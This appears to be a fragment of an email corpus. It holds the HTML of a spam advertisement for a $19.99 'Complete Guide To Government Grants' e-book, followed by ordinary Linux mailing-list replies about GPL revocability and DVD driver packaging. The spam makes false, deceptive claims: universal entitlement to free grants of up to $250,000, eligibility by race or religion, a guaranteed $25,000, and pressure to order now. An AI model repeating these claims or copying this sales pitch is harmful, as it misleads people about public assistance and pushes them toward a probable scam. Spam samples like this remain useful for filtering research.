 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://www.2003marketing.com/grants.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 If above link doesn't work, &lt;a href="http://2003marketing.com/grants.htm"&gt;Click Here
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 5945CoCw8-467cUcN8670ndsz7-l25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</si>
  <si>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Quoting Paul Linehan (plinehan@yahoo.com):
 &gt; The point here is that (under French law) the author can change the
 &gt; terms of the licence arbitarily. This is because any granting of
 &gt; rights by an author must be clearly delimited in terms of how long,
 &gt; where, to whom, dates and times.
 The GPL and similar licences are explicitly permanent grants of rights
 attached to an instance of his work.  (The other stuff mentioned
 concerns contract law, e.g., the required element of privity, etc.)
 &gt; In the absence of such limitations, the original author has the right
 &gt; to change his software back to closed on a whim.
 No, the author has the right to issue _additional_ instances under a
 different licence, such as a proprietary ("closed" [sic]) licence.  
 &gt; Rick Moen makes the point that it is not a sale but rather a granting
 &gt; of rights which are not default. 
 &gt; 
 &gt; See the bit about even the granting of rights by an author having to
 &gt; be explicitly specified - under French law.
 The analysis, here and elsewhere, concerns contract law.  This isn't
 contract law.
 This isn't the first time copyright attorneys have stumbled on this
 subject.  I'm sure it won't be the last.
 -- 
 Cheers,              "The front line of defense against such sophisticated 
 Rick Moen            viruses is a continually evolving computer operating 
 rick@linuxmafia.com  system that attracts the efforts of eager software
                      developers."  -- Bill Gates         
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 09:56, Matthias Saou wrote:
 &gt; &gt; Thank you, that was exactly what I needed.
 &gt; &gt; DVD works great now.
 &gt; 
 &gt; BTW, I think I'll kake it so that my ogle package automatically inserts
 &gt; this "options ide-cd dma=1" to /etc/modules.conf! It currently creates the
 &gt; /dev/dvd link to /dev/cdrom (which will work most of the time, if there's
 &gt; only one drive) if no /dev/dvd exists.
 Eek.  Maybe it's just me, but I don't think that's a good idea. 
 Outputting a message in %post and providing a README of some kind would
